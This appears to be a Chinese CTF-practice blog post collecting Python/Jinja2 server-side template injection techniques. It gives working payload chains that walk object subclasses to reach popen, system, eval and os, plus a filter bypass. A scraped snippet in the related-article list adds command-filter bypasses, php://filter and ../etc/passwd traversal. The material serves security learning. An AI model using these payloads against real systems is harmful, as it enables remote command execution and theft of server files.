SSTI(python模板注入)整理

最新推荐文章于 2025-04-16 20:13:12 发布
最新推荐文章于 2025-04-16 20:13:12 发布
阅读量781 收藏 8
点赞数 5
CC 4.0 BY-SA版权
分类专栏: CTF练习 文章标签: python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45931661/article/details/137499208
本文详细描述了在使用Django框架开发Web应用时,如何通过不规范代码利用攻击链来检测潜在漏洞,涉及eval、popen、__import__等函数的滥用,以及针对Flask和os类的多种利用方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞成因

在使用django框架进行web应用设计时,不规范的代码使用。
常用的的dgango代码为:
在这里插入图片描述
还可以设置动态网址,
在这里插入图片描述

python使用的web框架可以使用以下方法进行测试

在这里插入图片描述

攻击链相关类的说明

1.构建父类

''.__class__()

2.构建obg子类

obj.__ bases__()[0]

3.寻找obj的子类

obj.__subclasses__()

使用1,2,3,就可以构建一个寻找函数的攻击链,然后利用返回函数,看是否有漏洞,具体语句为:

''.__class__.__bases__[0].__subclasses__()

4.寻找类的地址

# 输入类的名字
''.__class__.__bases__[0].__subclasses__()[k]
# 寻找类的地址
''.__class__.__bases__[0].__subclasses__()[k].__init__
# 寻找所有全局变量,函数名称的字典,格式为[name:地址或值]
''.__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']
# 调用类的静态变量或者静态函数
''.__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('ls').read()
''.__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['system']('ls')

构造攻击函数链

总结,找到eval、popen、__import__函数,就可以进行getshell
os类里面有popen函数
__builtins__里面有eval、__import__方法
flask内置方法

方法1:
直接调用popen函数,_wrap_close类里面有popen函数

''.__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('whoami').read()

或者system函数
比如

''.__class__.__bases__[0].__subclasses__()[137].__init__.__globals__['os'].system('dir')

方法2:
查找有无os的基类,如linecache

''.__class__.__bases__[0].__subclasses__()[250].__init__.__globals__['os'].popen('whoami').read()

对于os基类的寻找,可以使用下面代码:

for i,k in zip(range(len(''.__class__.__bases__[0].__subclasses__())),''.__class__.__bases__[0].__subclasses__()):
    try:
        if k.__init__.__globals__['os']:
            print(k)
            print(i)
    except:
        pass

方法3:
使用__import__函数手动导入了os类

''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__import__']('os').popen('whoami').read()

方法4:
调用builtins类下的多个函数,比如eval和__import__(推荐:这里可以用的类比较多,使用方法2的代码进行查询)
这里以eval为例

''.__class__.__bases__[0].__subclasses__()[250].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")

以__import__为例,推荐使用__globals__[‘builtins’][‘import’]的格式,直接使用.__import__本地会报错。

''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__import__']('os').popen('dir').read()

方法5:
使用flask内置函数,其内置函数可以通过下面代码查看

{{self.__dict__._TemplateReference_context.keys()}}

然后可以简洁代码

# 存在漏洞的函数如下
lipsum、url_for、get_flashed_messages
# 存在漏洞的类如下
cycler,joiner、namesapce、config、request、session
# 函数利用方式如下
lipsum.__globals__['os'].popen('ls').read()
# 类利用方式如下
cycler.__init__.__globals__['os'].popen('ls').read()

{{}}过滤绕过

使用{% xxx %}即可

python 模板注入
m0_59485658的博客
12-16 561
web 程序包括两个文件:flask-test.py 和 Config.py 文件kali上搭建有漏洞的flask web服务注:以上代码存在ssti漏洞点在于render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,我们知道Flask 中使用了Jinja2 作为模板渲染引擎,在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把包裹的内容当做变量解析替换。
Python模板注入SSTI
sleepywin的博客
09-11 1158
模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码分离。即也拓宽了攻击面,注入模板中的代码可能会引发RCE或XSS。攻击者可利用模板注入漏洞执行任意的python代码,包括读取敏感文件、执行系统命令、访问数据库等。通常会通过在用户输入中插入。模板注入漏洞可能导致攻击者能够执行恶意代码或访问未授权的数据。在python中,常见的模板引擎包括。Jinja2中使用{{...}}或{%...%},使得攻击者能够在模板中插入恶意代码。未正确过滤或转义用户提供的输入时。使用模板引擎解析用户提供的输入。
Web_python_template_injection(Python模块注入
Welcome To Myon'Blog !
04-11 2135
Python的模块注入 flask/jinja2 常用于ssti的魔术方法 获取基类的几种方法 获取基本类的子类 采用os模块的listdir函数来读取目录 常用payload
CTF-WEB: python模板注入
weixin_59166557的博客
11-04 1166
Python模板注入漏洞通常出现在使用模板引擎生成动态内容的应用中。如果用户输入没有经过适当的处理直接插入模板中,就可能会导致模板注入漏洞。一个常见的例子是使用Jinja2模板引擎时,如果直接渲染用户输入,则可能导致代码执行等严重后果。在这个示例中,user_input是从查询参数中获取的用户输入,并直接插入到模板字符串中。这是非常危险的,因为用户可以注入任意Jinja2表达式。例如,如果用户访问URL,页面将会显示。这说明模板注入成功执行了7*7计算。
python模板注入(多种方法,CTF可直接使用)
weixin_47696216的博客
05-21 2223
CTF各种SSTI解题思路与方法
2025.2.8——二、Confusion1 SSTI模板注入|Jinja2模板
2402_87387800的博客
02-10 1023
题目来源:攻防世界 Confusion1。
php沙盒绕过ctf,浅析SSTI(python沙盒绕过)
weixin_39583162的博客
04-09 1098
在CTF比赛中见过不少的SSTI题目,在这里整理下思路,记录下0x01 简介SSTI(Server-Side Template Injection),即服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的0x02 攻击流程攻击流程,以文件读取为例子函数解析__c...
《从0到1:CTFer成长之路》书籍配套题目-[第三章 web进阶]Python安全问题
weixin_46703850的博客
02-25 1602
《从0到1:CTFer成长之路》书籍配套题目-[第三章 web进阶]Python安全问题
Pilot-Web:一款基于PythonFlask框架开发的前后端分离式渗透测试&漏洞挖掘Web靶场,内置WP与知识库的集成式教学靶场。
seoppg的博客
06-13 1436
Pilot领航员靶场是基于Web安全的漏洞测试靶场,一个专为教师和学生设计的WEB安全教学实践平台,旨在帮助网安初学者快速熟悉和掌握目前常见漏洞的原理和实际利用方法,以及帮助安全实践教师在课堂环境中演示教学如何进行WEB漏洞测试。Pilot靶场由 Flask + Mysql + AdminLTE 框架编写而成,模拟每类漏洞根据不同的情况又分别设计了不同的子类,全部共有30个漏洞环境。同时,Pilot在每个环境的右上角嵌入了四个模块作为辅助工具,希望对您的学习或教学有所帮助。
【攻防世界】十六、shrine
Hi~ 土拨鼠
09-24 454
打开所给场景,发现给了一段python代码: 整理一下源码进行分析: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_ji.
pythonssti模板注入
最新发布
My笔记的博客
04-16 1077
类似于python 中的type方法。
python模板注入_SSTI模板注入
weixin_35186171的博客
02-10 919
SSTI是个啥?SSTI(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理...
python安全SSTI模板注入
世间繁华梦一出
08-11 521
python安全——SSTI模板注入SSTI模板注入原理解释 SSTI模板注入原理解释 参考链接 https://xz.aliyun.com/t/7746 SSTI模板注入检测及攻击工具:tplmap
Python-模板注入
m0_51428325的博客
12-26 1962
何为模板注入模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,哲大大提升了开发效率,良好的设计也是的代码重用变得更加容易。 到那时模板引擎也拓宽了我们的攻击面,注入模板中的代码可能会引发RCE或者XSS flask基础 在学习SSTI之前,先把flask的运作流程搞明白,这样有利于更加快速的理解原理 路由 先看一段代码 from flask import flask @app.route('/index/') def hello_word(): .
python模板注入
RoboTerh的博客
08-05 1015
ssti漏洞 其漏洞的产生在于render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,而且Flask模板中使用了Jinja2作为模板渲染引擎,{{}}在Jinja2中作为变量包裹标识符,在渲染的时候将{{}}包裹的内容作为变量解析替换。 漏洞的解决方式: 将template中的<h3>%s!</h3>%url更改为<h3>{{url}}</h3> 这样以来,Jinja2在模板渲染的时候将url的值替换掉{{url}},
Python 开发 框架安全SSTI 模板注入漏洞测试.
网络安全领域___专研者.
05-11 806
SSTI (Server-Side Template Injection) 是一种Web应用程序安全漏洞,它发生在应用程序使用模板引擎渲染用户输入时。当应用程序将用户输入直接插入到模板中而不进行充分的过滤和验证时,就可能导致SSTI漏洞。攻击者可以利用这个漏洞注入恶意代码到模板中,从而执行任意命令,窃取敏感信息或者进一步渗透系统。
python SSTI注入
weixin_44843084的博客
06-21 908
https://www.jianshu.com/p/a77c50dfebcb https://xz.aliyun.com/t/3679#toc-9 SSTI(Server-Side Template Injection) 服务端模板注入,就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板Web应用可以把输入转换成特定的HTML文件或者email格式 {{ ... }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这个变量代表的值替换掉。 {% ... %}:装载一个控制语句。 {# ...
[渗透测试笔记] 15.python模板注入
H4ppyD0g的博客
08-28 1305
python的html模板使用 def test(): code = request.args.get('id') html = ''' <h3>%s</h3> ''' % (code) return render_template_string(html) 当我们访问页面的时候,py代码通过requests.args.get来获取’id’的值赋给code,然后生成html,然后render_template_string来渲染网页。 模板注入 就是指 将
python 模板注入_SSTI模板注入
weixin_39988930的博客
12-14 584
前言又划水了一天,最后划累了学习了一会,写了这篇文章,又遇到的hexo遇见花括号解析错误的问题,一点点把文章断点才解决(hexo断点调试SSTI介绍SSTI,服务端模板注入攻击,发生在MVA框架的view层中。注入原因:服务端接收了用户的输入,将未过滤的数据传给引擎解析,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题测试SSTI...
polar靶场 web swp
03-23
<think>好的,用户需要查找与Polar靶场相关的Web或SWP技术资料,特别是技术文档或使用教程。首先,我需要回忆之前提供的引用内容,看看有没有相关信息。引用[1]提到了Polar靶场通关笔记,涉及SSTI模版注入和Flask框架的分析,这可能与Web漏洞相关。引用[2]讨论了绕过过滤命令的方法,比如使用echo和passthru,这对Web题目可能有帮助。引用[3]是关于Reverse方向的题解,可能不太相关,但需要确认。 用户的需求集中在Web或SWP(可能是笔误,应为SSTI、SQLi、XSS等,或者特定术语)的技术文档。根据现有资料,引用[1]和[2]都涉及Web方向的解题技巧,尤其是绕过过滤和SSTI漏洞利用。需要将这些信息整合,提供具体的漏洞类型和解题思路,并建议查阅相关技术文章。 接下来要确保回答符合用户要求的结构,分步骤说明,并生成相关问题。同时注意引用标识的正确添加,比如在提到绕过过滤时引用[2],在SSTI部分引用[1]。可能还需要建议用户查阅其他资源,如官方文档或安全社区的内容,以补充现有引用中的信息。</think>### Polar靶场Web/SWP技术资料整理 根据已有资料,Polar靶场Web方向主要涉及以下技术点: 1. **SSTI(服务端模板注入)** - 在Flask框架中利用Jinja2模板引擎的特性,通过构造特殊参数实现代码执行,例如: `{{config.__class__.__init__.__globals__['os'].popen('id').read()}}` 需注意不同Python环境下的类继承关系差异[^1] 2. **命令执行绕过** - 当常用命令被过滤时,可用替代方案: ```bash echo%0a/etc/passwd # 空格绕过 {cat,flag.txt} # 花括号语法 base64<flag.txt # 重定向符绕过 ``` 执行函数可用`passthru`代替`system`,注意参数编码处理[^2] 3. **文件包含与路径遍历** - 尝试利用PHP伪协议: `php://filter/convert.base64-encode/resource=index.php` - 配合目录穿越读取敏感文件:`../../../../etc/passwd` 4. **反序列化漏洞** - 重点关注Java/Python的反序列化入口点,如: ```python pickle.loads(serialized_data) # Python反序列化点 ``` 需构造包含恶意__reduce__方法的对象链 §§推荐学习路径§§ 1. 先掌握基础Web漏洞原理(OWASP TOP 10) 2. 研究靶场提供的Docker环境配置(通常含`.env`文件) 3. 练习使用特殊编码绕过过滤:`${IFS}`代替空格、`%0a`换行符注入 4. 调试Jinja2模板渲染流程,使用`{{7*7}}`等测试表达式验证注入点[^1]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值